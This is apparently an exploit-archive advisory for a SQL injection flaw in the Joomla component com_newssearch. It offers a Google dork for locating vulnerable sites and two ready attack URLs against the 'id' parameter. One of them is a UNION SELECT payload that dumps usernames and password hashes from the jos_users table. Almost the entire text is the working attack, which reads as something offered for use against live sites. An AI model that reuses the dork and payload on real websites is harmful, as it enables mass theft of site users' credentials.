# Exploit Title: Joomla Component (com_newssearch) SQL Injection Vulnerability # Google Dork: allinurl: index.php?com_newssearch # Date: 7/15/2011 # Author: Robert Cooper (admin[at]websiteauditing.org) # Tested on: [Linux/Windows 7] #Vulnerable Parameters: id= ############################################################## Exploit: http://www.example.com/index.php?option=com_newssearch&type=detail§ion=2&id=15' http://www.example.com/index.php?option=com_newssearch&type=detail§ion=2&id=-1 union all select group_concat(username,0x3a,password,0x0a),2,3,4 from jos_users ############################################################## www.websiteauditing.org www.areyousecure.net # Shouts to the Belegit crew